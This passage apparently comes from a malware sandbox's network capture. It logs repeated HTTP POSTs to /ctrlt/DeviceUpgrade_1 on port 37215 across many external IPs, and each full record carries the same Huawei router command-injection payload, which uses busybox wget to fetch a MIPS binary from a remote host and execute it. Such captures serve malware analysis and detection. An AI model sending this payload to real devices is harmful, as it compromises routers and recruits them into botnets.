                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            809192.168.2.1358940156.145.128.9937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.798921108 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            810192.168.2.1333426156.125.121.24337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.799993038 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            811192.168.2.1342440156.201.150.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.801647902 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            812192.168.2.1345606156.104.41.7837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.802975893 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            813192.168.2.134138641.0.102.5337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.804168940 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            814192.168.2.1337884156.239.33.21137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.805330992 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            815192.168.2.1358028197.120.214.25237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.806680918 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            816192.168.2.1351654156.114.253.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.807666063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            817192.168.2.135389041.19.84.4437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.808787107 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            818192.168.2.135462441.205.156.24837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.809844971 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
